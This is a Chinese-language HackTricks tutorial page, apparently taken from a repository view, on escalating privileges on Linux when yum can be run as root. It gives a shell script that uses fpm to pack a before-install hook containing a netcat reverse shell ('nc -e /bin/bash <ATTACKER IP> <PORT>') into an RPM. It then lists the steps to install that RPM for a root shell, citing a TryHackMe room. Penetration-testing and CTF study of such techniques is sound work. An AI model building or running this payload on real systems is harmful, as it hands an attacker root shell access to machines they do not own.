hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2023-08-03 19:12:22 +00:00

4.4 KiB
Raw Blame History

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

gtfobins上还可以找到关于yum的更多示例。

通过RPM软件包执行任意命令

检查环境

为了利用这个向量用户必须能够以更高权限的用户即root执行yum命令。

这个向量的一个工作示例

tryhackmedaily bugle房间中可以找到这个漏洞的一个工作示例。

打包一个RPM

在下面的部分中,我将介绍如何使用fpm将一个反向shell打包到RPM中。

下面的示例创建了一个包其中包含一个before-install触发器其中包含一个可以由攻击者定义的任意脚本。安装时该软件包将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示但可以根据需要进行更改。

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

捕获一个shell

使用上面的示例,假设yum可以以更高权限的用户执行。

  1. rpm传输到主机
  2. 在本地主机上启动监听器,例如示例netcat监听器
  3. 安装易受攻击的软件包yum localinstall -y exploited-1.0-1.noarch.rpm
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥